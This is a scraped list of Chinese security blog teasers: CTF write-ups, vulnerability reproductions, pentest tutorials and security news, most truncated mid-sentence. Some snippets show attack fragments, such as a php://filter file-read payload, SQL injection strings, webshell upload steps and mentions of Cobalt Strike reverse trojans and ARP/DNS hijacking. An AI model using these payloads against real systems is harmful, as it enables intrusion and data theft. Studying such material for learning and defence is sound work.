漏洞描述 Microsoft Teams 是微软推出的一款团队协作平台，提供了聊天、通话、在线会议、文件共享等功能。 Microsoft Teams 受影响版本中，当用户加入攻击者设置的恶意 Microsoft Teams 会议时，攻击者可远程执行任意代码。漏洞名称Microso…

攻防世界-fileclude

原题解题思路直接展示源码了，flag.php应该存放了flag，在file1与file2都不为空且file2是“hello ctf”时file1将被导入。接下来做法很明显，让file为flag.php，file2为“hello ctf”。“?file1php://filter/readconvert.base64-en…

漏洞指北-VulFocus靶场专栏-中级02

漏洞指北-VulFocus靶场专栏-中级02 中级005 🌸thinkphp lang 命令执行（thinkphp:6.0.12）🌸step1：burp suite 抓包修改请求头step2 修改成功，访问shell.php 中级006 🌸Metabase geojson任意文件…

漏洞指北-VulFocus靶场专栏-中级03

漏洞指北-VulFocus靶场专栏-初级03 中级009 🌸gxlcms-cve_2018_14685🌸step1：安装系统密码rootstep2 进入后台页面账号密码：admin amdin888step3 查看详细有phpinfo() 中级010 🌸dedecms-cnvd_2018_01221&#x1f3…

pikachu中RCE出现乱码的解决的方案

exec “ping” 输入127.0.0.1 这种乱码的解决办法就是在pikachu/vul/rce/rce_ping.php目录里面的第18行代码 header("Content-type:text/html; charsetgbk");的注释打开即可。 BUT但是吧！又出现了其他的乱码！但是搞完这个再把它给注释掉就行了…

Positive Technologies：有针对性的攻击占非洲所有攻击的 68%

网络犯罪分子最常攻击的是非洲的金融公司和电信公司 Positive Technologies 分析了 2022–2023 年非洲遇到的各种网络安全威胁，并在圣彼得堡举行的第二届俄罗斯—非洲峰会上介绍了研究结果。根据我们的专家的介绍，非洲金融部门受到的网络攻击最多&#…

命令执行漏洞

1、命令执行漏洞 1.1、简介 Django是用Python开发的一个免费开源的Web结构，几乎包括了Web使用方方面面，能够用于快速建立高性能、文雅的网站，Diango提供了许多网站后台开发常常用到的模块，使开发者可以专注于业务部分。 1.2、漏…

服务管理和计划任务

文章目录服务管理计划任务服务管理 systemctl 命令字服务名 //配置服务与systemctl有关的命令字： 计划任务一次性计划 at 时间 at now 5 min //当前时间五分钟后执行 at -l //列出计划任务 atrm 任务号 //删除计划任务执行完命令后Ctrld生效周期性计…

泛微E-Office任意文件上传漏洞复现（HW0day）

0x01 产品简介泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。 0x02 漏…

OffSec Labs Proving grounds Play——FunboxEasyEnum

文章目录端口扫描目录扫描文件上传漏洞利用查看用户爆破密码sudo提权flag位置FunboxEasyEnum writeup walkthrough Funbox： EasyEnum ~ VulnHub Enumeration Brute-force the web server’s files and directories. Be sure to check for common file extensions. Remote…

内网横向移动—ARP攻击图片捕捉数据劫持DNS劫持

内网横向移动—ARP攻击&图片捕捉&数据劫持&DNS劫持 1. ARP1.1. APR介绍1.1.1. ARP工作原理1.1.2. APR欺骗工作原理 1.2. 环境准备1.3. 适用场景 2. ARP断网攻击演示2.1. 使用kali进行演示2.1.1. nmap判断存活2.1.2. 安装工具2.1.3. 攻击Windows 10虚拟机2.1.3.1. 查…

VM虚拟机端口映射接收CS弹反木马

VM虚拟机端口映射接收CS弹反木马 1. 前言1.1. 前期准备1.2. 整体思路 2. 整体操作流程2.1. 虚拟机配置2.2. WIFI路由器设置2.3. CS设置2.3.1. 创建本地监听器2.3.2. 创建生成木马监听器2.3.3. 创建反弹木马2.3.4. 查看效果 1. 前言在日常的对客户的内网进行渗透的时候&#xf…

CTFHub XSS DOM跳转 WriteUp

前文：DOM反射XSS 进入网站，直接查看源代码，下面是关键代码，这里有xss漏洞： <script>var target location.search.split("")if (target[0].slice(1) "jumpto") {location.href target[1…

代码审计-Thinkphp框架审计前置知识点

代码审计必备知识点： 1、代码审计开始前准备： 环境搭建使用，工具插件安装使用，掌握各种漏洞原理及利用,代码开发类知识点。 2、代码审计前信息收集： 审计目标的程序名，版本，当前环境(系统,中间件…

【密码学】维京密码

维京密码瑞典罗特布鲁纳巨石上的图案看起来毫无意义，但是它确实是一种维京密码。如果我们注意到每组图案中长笔画和短笔画的数量，将得到一组数字2、4、2、3、3、5、2、3、3、6、3、5。组合配对得到24、23、35、23、36、35。现在考虑如图1.4所示的内容&a…

[鹏城杯 2022]简单包含

直接用php：// 有wtf 加脏数据绕过

2023企业微信0day漏洞复现以及处理意见

2023企业微信0day漏洞复现以及处理意见一、漏洞概述二、影响版本三、漏洞复现小龙POC检测脚本: 四、整改意见免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失&#x…

泛微 E-Office文件上传漏洞复现

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章&#xff0c…

是时候让所有员工成为网络安全战士

是时候让所有员工成为网络安全战士锁定疲劳是真实存在的。经过数周的隔离，许多人对在家工作的新鲜感逐渐消失。疲倦、情绪起伏、额外的财务压力和对亲人健康的担忧正在造成损失。但是，我们仍在努力。而此时的危险是自满。网络犯罪每天都在袭击政府、企…

第三届“赣政杯”网络安全大赛 | 赛宁筑牢安全应急防线

为持续强化江西省党政机关网络安全风险防范意识，提高信息化岗位从业人员基础技能，提升应对网络安全风险处置能力。由江西省委网信办、江西省发展改革委主办，江西省大数据中心、国家计算机网络与信息安全管理中心江西分中心承办&#xff0…

[SWPUCTF 2022 新生赛]ez_ez_php

这段代码是一个简单的PHP文件处理脚本。让我们逐行进行分析： error_reporting(0); - 这行代码设置了错误报告的级别为0，意味着不显示任何错误。 if (isset($_GET[file])) { - 这行代码检查是否存在一个名为"file"的GET参数。 if ( substr($_…

[网络安全学习篇01]：windowsxp、windows2003、windows7、windows2008系统部署（千峰网络安全视频笔记）

VM 虚拟机：VMware Workstation 15.5 PRO（建议升至最高版本） 部署windows-xp系统一、配置虚拟机硬件并安装系统 1、在VMware文件目录下创建一个空文件夹将其命名位：winxp-1 2、打开VMware软件，点击创建新的虚拟机。…

使用metasploit(MSF)对windows的ms17-010漏洞进行利用

主机发现 Ping扫描-禁用端口扫描 nmap -sn 192.168.1.0/24 ─# nmap -sn 192.168.1.0/24 Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-14 10:00 EDT Nmap scan report for 192.168.1.1 Host is up (0.0053s latency). MAC Address: FC:BC:D1:C7:2F:A8 (Huawei Te…

亿赛通电子文档安全管理系统 RCE漏洞复现

0x01 产品简介亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产&…

kali换源之后更新

kali换源之后更新 1.更新索引 apt-get update 2.更新软件 apt-get upgrade 3.删除缓存包 apt-get clean

网络安全入门教程（非常详细）从零基础入门到精通，看这一篇就够了。

基本方向: 1.web安全方面(指网站服务器安全方面,进行渗透测试,检测漏洞以及安全性) 2.逆向破解方面(对软件进行破解,脱壳) 以下内容是针对web安全方面的网络安全技术讲解: 如果你对网络安全方面没有任何的了解,如何成为一名网络安全这个问题对你来说很迷茫的话.接下来我将从以…

腾讯多媒体实验室：基于三维卷积神经网络的全参考视频质量评估算法

腾讯有多个视频业务线，点播视频有腾讯视频、企鹅影视，短视频有微视、K歌，直播类有Now直播、企鹅电竞，实时传输类有QQ和微信的音视频通话、无线投屏和腾讯会议等。用户对不同的产品有不同程度的期待：比如理想网络环境下…

攻防世界-disabled_button

原题解题思路看页面源码把这个删了就行

攻防世界-backup

原题解题思路备份文件后缀大多是bak、git、svn、swp等，尝试index.php.bak就有文件下载了:

buu第五页 wp

[RootersCTF2019]babyWeb 预期解一眼就是sql注入，发现过滤了 UNION SLEEP " OR - BENCHMARK盲注没法用了，因为union被过滤，堆叠注入也不考虑，发现报错有回显，尝试报错注入。尝试： 1||(updatex…

DC-4 靶机

DC_4 信息搜集存活检测详细扫描后台网页扫描网页信息搜集只有一个登陆界面漏洞利用尝试使用 burpsuite 密码爆破尝试使用用户名 admin 登录管理员页面成功爆破出密码 happy 登录管理员页面显示可以使用命令但只能使用三个命令继续使用 bp 拦截查看数据包…

安全多方计算框架最全合集（持续更新）

安全多方计算框架本文对现有安全多方计算/学习框架进行了全面、系统的梳理。目前大部分安全多方计算框架主要基于秘密共享、同态加密、混淆电路以及相关基本模块的组合。通常使用定制的协议来支持特定数量的参与方（一般为两方或三方），导致…

思科披露新的IOS XE零日漏洞，用于部署恶意软件植入

导语：思科最近披露了一个新的高危零日漏洞（CVE-2023-20273），该漏洞被积极利用来在已经通过本周早些时候披露的CVE-2023-20198零日漏洞遭到侵害的IOS XE设备上部署恶意植入物。漏洞披露思科最近披露了一款名为CVE-2023-20273的高…

buuctf[HCTF 2018]WarmUp 1

题目环境： 发现除了表情包，再无其他F12试试发现source.php文件访问这个文件，格式如下：url/source.php回显如下：PHP代码审计： <?php highlight_file(__FILE__); class emmm {public static function ch…

hackbar基于插件的网络渗透测试工具

一、安装安装：通过Firefox在插件扩展里面找到hackbar v2进行安装(注意hackerbar是收费的；v2不是) 安装成功示例： 二、基本使用 1.Load URL 解释：将当前网页的url自动填充到多行文本框里面 2.Split URL 解释：自动…

如何查看SSL证书是OV还是DV?

网站的安全性与信任度对于用户来说至关重要，它决定着用户是否继续浏览以及是否与您开展业务。SSL证书则是确保网站能够通过HTTPS加密安全传输数据的基础，可确保网站的安全可信。部署了SSL证书的网站打开后，在浏览器地址栏处会有安全锁标志。而…

HVV（护网）蓝队视角的技战法分析

一、背景 1.HVV行动简介 HVV行动是国家应对网络安全问题所做的重要布局之一。从2016年开始，随着我国对网络安全的重视，演习规模不断扩大，越来越多的单位都加入到HVV行动中，网络安全对抗演练越来越贴近实际情况，各机构…

软考-防火墙技术与原理

本文为作者学习文章，按作者习惯写成，如有错误或需要追加内容请留言（不喜勿喷） 本文为追加文章，后期慢慢追加 by 2023年10月防火墙概念根据网络的安全信任程度和需要保护的对象，人为地划分若干安全区域…

漏洞复现--金和OASQL注入

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

红队打靶：Misdirection打靶思路详解（vulnhub）

目录写在开头第一步：主机发现与端口扫描第二步：Web渗透（80端口，战术放弃） 第三步：Web渗透（8080端口） 第四步：sudo bash提权第五步：/etc/passwd利…

了解单域名证书和通配符证书的区别，选择合适的SSL证书解决方案

随着互联网的不断发展，网站安全性问题一直备受关注，在保护网站数据安全的过程中，SSL证书一直发挥着至关重要的作用。而在选择SSL证书时，单域名证书和通配符证书是两种常见的选择。本文将详细介绍单域名证书和通配符证书的区别&…

fastjson-1.2.24-rce(CVE-2017-18349)fastjson-1.2.47-rce(CNVD-2019-22238)

一.fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349) fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链影响范围…

内网渗透神器CobaltStrike之Profile文件编写(十)

简介在网络渗透测试和红队模拟攻击中，隐藏命令与控制（C2）流量的特征对于成功绕过入侵检测系统至关重要。Cobalt Strike提供了一个强大的工具——Malleable C2 profiles，用于自定义C2流量，从而使其看起来像正常的网络…

攻防世界-supersqli

原题解题思路直接查找看不到明显的回显变化先找回显变化数量 -1 order by 2 #如果是3列就报错，说明只有两列。接下来找数据库名称： -1 union select 1,databases # 结果是后端做了一些简单的过滤，需要更换查找语句。 -1; show …

【中危】 Apache NiFi 连接 URL 验证绕过漏洞（CVE-2023-40037）

漏洞描述 Apache NiFi 是一个开源的数据流处理和自动化工具。在受影响版本中，由于多个Processors和Controller Services在配置JDBC和JNDI JMS连接时对URL参数过滤不完全。使用startsWith方法过滤用户输入URL，导致过滤可以被绕过。攻击者可以通过构造特…

【漏洞库】Fastjson_1.2.47_rce

文章目录漏洞描述漏洞编号漏洞评级影响版本漏洞复现- 利用工具- 漏洞环境- 漏洞扫描- 漏洞验证- 深度利用- GetShell- EXP 编写漏洞挖掘- 寻找入口点- 指纹信息修复建议- 漏洞修复漏洞原理漏洞描述 Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越&am…

【高危】MarkText＜=0.17.1 存在DOM型XSS漏洞（CVE-2023-2318）

漏洞描述 MarkText 是热门的开源Markdown编辑器，覆盖Windows/Linux/MacOS平台。 MarkText 0.17.1及之前版本中的 pasteCtrl 类未对用户可控的 HTML 内容进行过滤，当用户将攻击者可控的 HTML 代码粘贴至 MarkText 编辑器中时，攻击者可利用DO…

春秋云境：CVE-2021-40282（zzcms注入）

一、题目靶标介绍： 站长招商网内容管理系统简称 ZZCMS，由ZZCMS团队开发，融入数据库优化，内容缓存，AJAX等技术，使网站的安全性、稳定性、负载能力得到可靠保障。源码开放，功能模块独立&#…

使用威胁搜寻增加网络安全

什么是威胁搜寻威胁搜寻（也称为网络威胁搜寻）是一种主动网络安全方法，涉及主动搜索隐藏的威胁，例如组织网络或系统内的高级持续性威胁和入侵指标。威胁搜寻的主要目标是检测和隔离可能绕过网络外围防御的威胁，使管理…

网络安全在医疗行业中的重要性

不可否认，现代世界见证了技术和医疗行业的交织，塑造了我们诊断、治疗和管理健康状况的新方式。随着电子健康记录取代纸质文件，远程医疗缩短了患者和医疗服务提供者之间的距离，数字化转型既是福音，也是挑战。最近的全球…

网络安全（黑客）自学，看这篇就够了！

前言想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、…

2022美亚杯个人赛复刻

案件详情于2022年10月，有市民因接获伪冒快递公司的电邮，不慎地于匪徒架设的假网站提供了个人信用咭资料导致经济损失。警方追查下发现当中一名受骗市民男子李大輝 (TaiFai) 的信用卡曾经被匪徒在区内的商舖购物。后来警方根据IP地址，锁定…

软考-网络物理隔离技术原理与应用

本文为作者学习文章，按作者习惯写成，如有错误或需要追加内容请留言（不喜勿喷） 本文为追加文章，后期慢慢追加 by 2023年10月网络物理隔离概述网络物理隔离是指通过物理隔离来划分网络区域，使得这些区域…

VulnHub SICKOS: 1.1

一、信息收集 1.nmap扫描 IP：192.168.103.177 开放端口：22、3128、8080 这里可以看到3128端口是作为代理使用的，所以想访问80端口必须走3128端口代理 2.利用burp挂上游代理然后直接开代理，访问80端口 3.扫描目录因为3128端…

BUUCTF wireshark 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 黑客通过wireshark抓到管理员登陆网站的一段流量包（管理员的密码即是答案) 密文： 下载附件，解压后得到一个.pcap文件。解题思路： 1、双击文件，在wires…

【漏洞复现】蓝凌EIS智慧协同平台任意文件上传

目录蓝凌智慧协同平台介绍漏洞搜索漏洞点漏洞复现 nuclei poc 验证漏洞修复蓝凌智慧协同平台介绍蓝凌智慧协同平台是个自动化办公OA，具有多端同步、无缝协作,提供移动端（蓝凌KK、阿里钉钉、微信企业号）、桌面端、网页端多端应…

从【臀部监控】到【电脑监控软件】，企业如何在隐私权与管理权博弈中找到平衡

【臀部监控】依稀记得在2021年初某个高科技产品的爆火，惹得各大媒体网站争相报道。起因是一位杭州网友在论坛上发帖，不久前公司给员工发放了一批高科技坐垫。这个坐垫能自动感应心跳、呼吸在内的诸多人体数据，还能提醒人保持正确坐姿以及…

关于网络安全运营工作与安全建设工作的一些思考

以下内容是个人成长过程中对于网络安全运营工作的理解和思考，希望通过这篇文章帮助大家更好的去做安全运营体系化建设，开始吧！ 文章目录一、网络安全运营是什么？二、网络安全运营建设阶段第一阶段：设备限制阶段第二阶…

30小时教你玩转CTF—实战分享 | Crypto-RSA

序言最近对Crypto有点兴趣，所有写个帖子跟进学习。在进行Crypto的CTF解题过程中发现，大多ctf题是以RSA为核心展开的，当然可能混杂了一些其他加密方法。对RSA了解的同学，应该知道RSA解密需要对初等数论的知识有些了解。下面我将根…

网络安全将会是IT行业中比较容易就业的方面

当前，网络空间安全面临的形势复杂多变，对抗趋势越发凸显。以窃取敏感数据、破坏关键信息技术设施为目标的有组织网络攻击愈演愈烈，零日漏洞、供应链攻击、数据泄露等重大安全事件层出不穷。回望2022年，国内，以西北工业…

Apache ActiveMQ RCE漏洞复现（CNVD-2023-69477）

0x01 产品简介 ActiveMQ是一个开源的消息代理和集成模式服务器，它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目，用于实现消息中间件，帮助不同的应用程序或系统之间进行通信。 0x02 漏洞概述 Apache ActiveMQ 中存…

BUUCTF qr 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 这是一个二维码，谁用谁知道！ 密文： 下载附件，得到一张二维码图片。解题思路： 1、这是一道签到题，扫描二维码得到flag。 flag：…

漏洞复现-dedecms文件上传（CVE-2019-8933）

dedecms文件上传_CVE-2019-8933 漏洞信息 Desdev DedeCMS 5.7SP2版本中存在安全漏洞CVE-2019-8933文件上传漏洞描述 Desdev DedeCMS（织梦内容管理系统）是中国卓卓网络（Desdev）公司的一套基于PHP的开源内容管理系统&#x…

NUUO摄像头远程命令执行漏洞复现 [附POC]

文章目录 NUUO 摄像头远程命令执行漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 NUUO 摄像头远程命令执行漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术从事非法测试&#xff…

漏洞复现-Apache Druid 任意文件读取 _（CVE-2021-36749）

Apache Druid 任意文件读取 _（CVE-2021-36749） 漏洞信息 Apache Druid Version 0.22以下版本中存在安全漏洞CVE-2021-36749文件读取漏洞描述由于用户指定 HTTP InputSource 没有做出限制，可以通过将文件 URL 传递给 HTTP InputSourc…

Python武器库开发-高级特性篇(八)

高级特性篇(八) 高阶函数 Python作为一门高级编程语言，拥有着强大的函数式编程能力。其中高阶函数就是Python函数式编程的重要组成部分。在Python中，函数可以被当作变量一样进行操作，包括作为参数传递给其他函数，或者作为返回值…

【赠书活动】国家数据局正式揭牌，数据专业融合型人才迎来发展良机

摘要：新华社北京10月26日电《中国证券报》26日刊发文章《国家数据局揭牌数据要素产业进入加速发展期》。文章称，10月25日，国家数据局正式揭牌。业内人士认为，这标志着我国数字经济发展新阶段的开始，预计数据要素配套…

中间件安全-CVE 复现K8sDockerJettyWebsphere漏洞复现

目录服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere中间件-K8s中间件-Jetty漏洞复现CVE-2021-28164-路径信息泄露漏洞CVE-2021-28169双重解码信息泄露漏洞CVE-2021-34429路径信息泄露漏洞中间件-Docker漏洞复现守护程序 API 未经授权访问漏洞…

漏洞复现--用友畅捷通T+ .net反序列化RCE

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

使用SecScanC2构建P2P去中心化网络实现反溯源

个人博客: xzajyjs.cn 前言这款工具是为了帮助安全研究人员在渗透测试过程中防止扫描被封禁、保护自己免溯源的一种新思路。其利用到了区块链中的p2p点对点去中心化技术构建以来构建代理池。工具链接：https://github.com/xzajyjs/SecScanC2 实验过程该工具分为…

鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]

文章目录鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术…

BUUCTF zip伪加密 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 下载附件，得到一个zip压缩包。密文： 解题思路： 1、刚开始尝试解压，看到了flag.txt文件，但需要解压密码。结合题目，确认这是zip伪加密&#…

CVE-2021-41773/42013 apache路径穿越漏洞

影响范围 CVE-2021-41773 Apache HTTP server 2.4.49 CVE-2021-42013 Apache HTTP server 2.4.49/2.4.50 漏洞原理 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码，然后判断是否存在…/的路径穿越符&#xf…

如何高效自学（黑客技术）方法——网络安全

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

Xray的简单使用

xray 简介 xray 是一款功能强大的安全评估工具，由多名经验丰富的一线安全从业者呕心打造而成，主要特性有: 检测速度快。发包速度快; 漏洞检测算法效率高。支持范围广。大至 OWASP Top 10 通用漏洞检测，小至各种 CMS 框架 POC，均…

利用HTTP2，新型DDoS攻击峰值破纪录

亚马逊、Cloudflare 和谷歌周二联合发布消息称，一种依赖于 HTTP/2 快速重置技术的攻击行为对它们造成了破纪录的分布式拒绝服务 (DDoS) 攻击。根据披露的信息，该攻击自8月下旬以来便一直存在，所利用的漏洞被跟踪为CVE-2023-44487&#xff0c…

网络安全—小白自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)

SeaCMS_v10.1_远程命令执行(CNVD-2020-22721) 漏洞信息 seacms_v10.1有效cnvd-2020-22721命令执行漏洞描述海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞，在w1aqhp/admin_ip.php下第五行使用set参数，对…

僵尸网络｜让人防不胜防的内部网络安全问题，作为企业IT不得不了解的基础安全

在当今数字化世界中，僵尸网络是一种令人不安的存在。它不是一种具体的物理实体，而是一种由恶意软件控制的虚拟网络。这个网络由成百上千，甚至数百万台计算机组成，这些计算机往往被感染，成为攻击者的"僵尸"&a…

漏洞复现--企望制造ERP系统 RCE

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

Python武器库开发-高级特性篇(九)

高级特性篇(九) 切片在Python中，切片(slice)是对序列型对象(如list, string, tuple)的一种高级索引方法。普通索引只取出序列中一个下标对应的元素，而切片取出序列中一个范围对应的元素，这里的范围不是狭义上的连续片段。要创建切片&…

关于FTP的一些往事

公司每天都要从美国的服务器下载大量的语音文件。然后根据语音的内容完成相关的医疗报告。不同语音的实时性要求是不一样的，有些要求6小时内完成（TAT6） ，有些则是12小时。中美之间的网速又特别慢，所以，如何…

第5期 | GPTSecurity周报

GPTSecurity是一个涵盖了前沿学术研究和实践经验分享的社区，集成了生成预训练 Transformer（GPT）、人工智能生成内容（AIGC）以及大型语言模型（LLM）等安全领域应用的知识。在这里，您可以…

国密改造什么意思？国密SSL证书在国密改造中有什么作用？

在网络攻击日益增多的当今，我国政府与企业都意识到加强网络信息安全的重要性，而国密改造不仅可实现密码技术升级，还可实现商用密码自主可控，是国家战略的重要组成部分，由此国密改造成为我国网络安全领域的重要话题。那…

buuctf[强网杯 2019]随便注 1(超详细，三种解法）

第一种解法堆叠注入网页环境判断是否是字符型注入1判断是否存在关键字过滤select联合查询被过滤，只能用堆叠注入了查看有几个字段1 order by 2#正常回显1 order by 3#回显报错，可以看出只有两个字段查看所有数据库1; show databases;查看所有数据表1;…

python随手小练10（南农作业题）

题目1： 编写程序，输出1~1000之间所有能被4整除，但是不能被5整除的数具体操作： for i in range(1,1000): #循环遍历1~999，因为range是左闭右开if (i % 4 0) and (i % 5 ! 0) :print(i) 结果展示： 题目2&…

【网络安全 --- 文件上传靶场练习】文件上传靶场安装以及1-5关闯关思路及技巧，源码分析

一，前期准备环境和工具 1，vmware 16.0安装若已安装，请忽略【网络安全 --- 工具安装】VMware 16.0 详细安装过程（提供资源）-CSDN博客文章浏览阅读186次，点赞9次，收藏2次。【网络安全 --- 工…

黑客在Pwn2Own Toronto上以58个零日漏洞赚取超过100万美元

Pwn2Own Toronto 2023黑客大赛已经圆满结束，安全研究人员通过攻击消费类产品的58个零日漏洞（以及多个漏洞碰撞）赚取了1,038,500美元。此次比赛由趋势科技的零日倡议（Zero Day Initiative，简称ZDI）组织&…

F5修复了允许远程代码执行攻击的BIG-IP认证绕过漏洞

图片导语近日，网络安全公司Praetorian Security的研究人员发现了一项影响F5 BIG-IP配置工具的严重漏洞，该漏洞被命名为CVE-2023-46747。攻击者可以通过远程访问配置工具来执行未经身份验证的远程代码，从而对系统进行攻击。本文将详细介绍该…

2023 年四川省职业院校技能大赛（高等职业教育） “信息安全管理与评估”样题

2023年四川省高职院校大学生信息安全管理与评估技能大赛任务书第一阶段：第二阶段：任务 1 应急响应（40分）任务 2 操作系统取证（40 分）任务 3 网络数据包分析（50 分）任务 4 计算机单机…

SHCTF2023 山河CTF Reverse方向week2weenk3部分WP【详解】

文章目录 [WEEK3]ststst[WEEK2]not gcc[WEEK2]Run?润！[WEEK2]Authurs_box[WEEK2]pycode [WEEK3]ststst 64 bit 的 ELF 文件 sub_400763点进去看看 mprotect ，这个这一题是SMC TEA的考察，我写过一篇关于 SMC学习网鼎杯jocker 可以使用id…

Day 14 python学习笔记

面向对象对象对应着现实中具体的事物生活中程序中设计表格--------------设计类打印表格---------------创建对象填写表格---------------对象属性赋值面向对象编程使用对象进行编程设计一个类，基于类去创建对象，并使用对象完成具体的操作类定义…

web：[网鼎杯 2020 青龙组]AreUSerialz

题目点进题目发现需要进行代码审计 function __destruct() {if($this->op "2")$this->op "1";$this->content "";$this->process();}这里有__destruct()函数，在对象销毁时自动调用，根据$op属性的值进行…

ENSP L2TP Over IPSec

本文拓扑沿用上一篇文章《ENSP L2TP 配置》,相关配置有差异。拓扑准备工作客户端软件：URL 真机网络可以到达LNS10.100.1.254 防火墙上接口划分到相应安全区域，安全策略全开（本文只是测试，现网中根据自己网络情况严格设置安…

实战 | 记一次红队打的逻辑漏洞

八月初参加某市演练时遇到一个典型的逻辑漏洞，可以绕过验证码并且重置任意用户的密码。首先访问页面，用户名处输入账号会回显用户名称，输入admin会回显系统管理员。（hvv的时候蓝队响应太快了，刚把admin的权限拿到了&a…

获取服务器或域控登录日志工具

SharpUserIP 功能简介服务器登陆日志 (需管理员权限) 在域控或远程提取登录日志，快速获取域用户对应的 IP 地址项目地址：https://github.com/lele8/SharpUserIP 使用说明 ___ _ _ _ ___ ___/ __| |_ __ _ _ _ _ _…

避雷！又有2本期刊被标记“On Hold”！含中科院2区（TOP），共8本有风险！

期刊动态：新增2本期刊“On Hold” 最新，又有2本期刊被科睿唯安标记为「On Hold」！这2本期刊分别为MIGRATION LETTERS和REVISTA DE GESTAO E SECRETARIADO-GESEC。目前科睿唯安官网：共有8本期刊被标记为「On Hold」，…

BUUCTF 基础破解 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 给你一个压缩包，你并不能获得什么，因为他是四位数字加密的哈哈哈哈哈哈哈。。。不对我说了什么了不得的东西。。密文： 下载附件解压，发现一个rar压缩包。解题思…

警报：Citrix和VMware漏洞的PoC利用代码已发布

导语近日，虚拟化服务提供商VMware向客户发出警报，称其Aria Operations for Logs中的一个已修补安全漏洞的PoC利用代码已经发布。这个高危漏洞（CVE-2023-34051）是一种绕过身份验证的情况，可能导致远程代码执行。本文将…

Server2131

B-10：中间件渗透测试任务环境说明：服务器场景：Server2131（关闭链接）服务器场景操作系统：Linux

网络安全—黑客技术（自学笔记）

一、网络安全应该怎么学？ 1.计算机基础需要过关这一步跟网安关系暂时不大，是进入it行业每个人都必须掌握的基础能力。计算机网络计算机操作系统算法与数据架构数据库 Tips:不用非要钻研至非常精通，可以与学习其他课程同步进行。 2.渗透技…

【网络安全】防火墙知识点全面图解（二）

本系列文章包含： 【网络安全】防火墙知识点全面图解（一）【网络安全】防火墙知识点全面图解（二） 防火墙知识点全面图解（二） 21、路由器的访问控制列表是什么样的？22、防火墙的安全策…

服务器和普通电脑有何区别？43.248.189.x

简单来讲，服务器和电脑的功能是一样的，我们也可以把服务器称之为电脑（PC机），只是服务器对稳定性与安全性以及处理器数据能力有更高要求，比如我们每天浏览一个网站，发现这个网站每天24小时都能访…

黑客自学笔记

谈起黑客，可能各位都会想到：盗号，其实不尽然；黑客是一群喜爱研究技术的群体，在黑客圈中，一般分为三大圈：娱乐圈技术圈职业圈。娱乐圈：主要是初中生和高中生较多，玩网恋…

Vulnhub: bassamCTF: 1靶机

kali：192.168.111.111 靶机：192.168.111.210 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.210 修改hosts文件爆破出子域名welcome wfuzz -H HOST: FUZZ.bassam.ctf -u http://192.168.111.210 -w /usr/share/wor…

网络安全（黑客）——自学日薪2700

以下是练习舞蹈时长两年半的苕皮哥的故事你想想一个跨专业的都能拿到日薪2700，你上你也行，那么接下来就是我给大家，整理的网络安全学习思路，让大家斩获高薪！ 前言： 想自学网络安全（黑客技术&am…

网络安全（黑客）自学——日薪2700

以下是练习舞蹈时长两年半的苕皮哥的故事你想想一个跨专业的自学三个月都能拿到日薪2700，你上你也行，那么接下来就是我给大家，整理的网络安全学习思路，让大家斩获高薪！ 前言： 想自学网络安全（黑…

渗透测试漏洞原理之---【XSS 跨站脚本攻击】

